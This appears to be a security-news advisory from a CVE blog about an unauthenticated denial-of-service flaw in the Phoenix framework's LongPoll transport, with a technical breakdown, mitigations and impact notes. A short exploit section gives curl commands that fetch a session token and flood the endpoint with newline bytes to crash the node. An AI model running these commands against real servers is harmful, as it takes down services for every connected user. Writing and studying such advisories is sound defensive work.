Listen to this Post
How CVE‑2026‑32689 works (technical breakdown)
- The flaw lives in Phoenix’s `LongPoll` transport, which processes HTTP POST requests bearing the `Content‑Type: application/x‑ndjson` header.
- Inside
Elixir.Phoenix.Transports.LongPoll:publish/4, the incoming NDJSON body is split into a list using `String.split(payload, “\n”)` without any limit on the number of resulting elements. - An attacker can craft a request whose body consists entirely of newline bytes. Because every `\n` creates another element, the amplification is 1:1: a 1 MB payload yields ≈1 million empty binaries, whereas an 8 MB payload yields ≈8.4 million empty binaries.
- After splitting, `Enum.map` iterates over this enormous list, immediately constructing a second list of identical size. This doubles the already excessive memory footprint.
- Both the split list and the mapped list are materialised in memory simultaneously, exhausting the BEAM’s heap and scheduler threads.
- The node crashes, terminating all active LiveView sessions and bringing the entire Phoenix instance offline.
- Exploitation does not require authentication: a valid session token is needed to reach the vulnerable POST endpoint, but any client can obtain one by issuing an unauthenticated GET request to the same endpoint with a matching `Origin` header.
- The endpoint is public by design; long‑poll has been enabled by default for all newly generated Phoenix projects since version 1.7.11.
- A handful of concurrent requests are sufficient to trigger memory exhaustion, making the attack practical and highly effective.
DailyCVE form
Platform: Phoenix
Version: 1.7.0‑1.7.21, 1.8.0‑1.8.5
Vulnerability: Unbounded memory allocation
Severity: High (CVSS 8.2‑8.7)
Date: 2026‑05‑05
Prediction: Patch available (2026‑05‑05)
Analytics under “What Undercode Say”
Confirm long‑poll is enabled (typical config) grep -r "longpoll:" config//.ex lib//socket.ex Simulate the amplification attack (conceptual) curl -X POST http://target/live/websocket?vsn=2.0.0 \ -H "Content-Type: application/x-ndjson" \ --data-binary @<(yes '' | head -n 1000000) 1 million newlines ~1 MB
Exploit
- Obtain a valid session token via an unauthenticated GET:
`curl -i ‘http://target/live/websocket?vsn=2.0.0’ -H ‘Origin: http://attacker.com’`
2. Extract the `”token”` from the `phx:session` event in the response. - Send a POST with `Content-Type: application/x-ndjson` and a payload filled with `\n` bytes, using the obtained token.
- Watch memory usage spike and the node crash within seconds.
Protection from this CVE
Upgrade to Phoenix 1.7.22 or 1.8.6 (or any later patched release).
Disable long‑poll transport entirely in all `Phoenix.Socket` declarations:
socket "/live", Phoenix.LiveView.Socket, websocket: true, longpoll: false
If long‑poll is required, apply network‑level mitigations:
- Limit request size (e.g., `max_body_length` in your reverse proxy).
- Enforce strict rate limiting on the long‑poll endpoint.
- Deploy a Web Application Firewall (WAF) rule that blocks NDJSON bodies containing a high proportion of newline characters.
Impact
Denial of Service (crash) of the entire Phoenix node, affecting all connected users and services.
No authentication required – any remote attacker who can reach the endpoint can trigger the DoS.
Low‑resource attack: a single HTTP request of a few megabytes can produce millions of list entries, causing memory exhaustion in seconds.
Widespread exposure: long‑poll is enabled by default for new Phoenix projects since 1.7.11, meaning countless production deployments are vulnerable unless explicitly hardened.
No data breach or integrity loss – the impact is purely availability (CIA triad: Availability loss only).
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
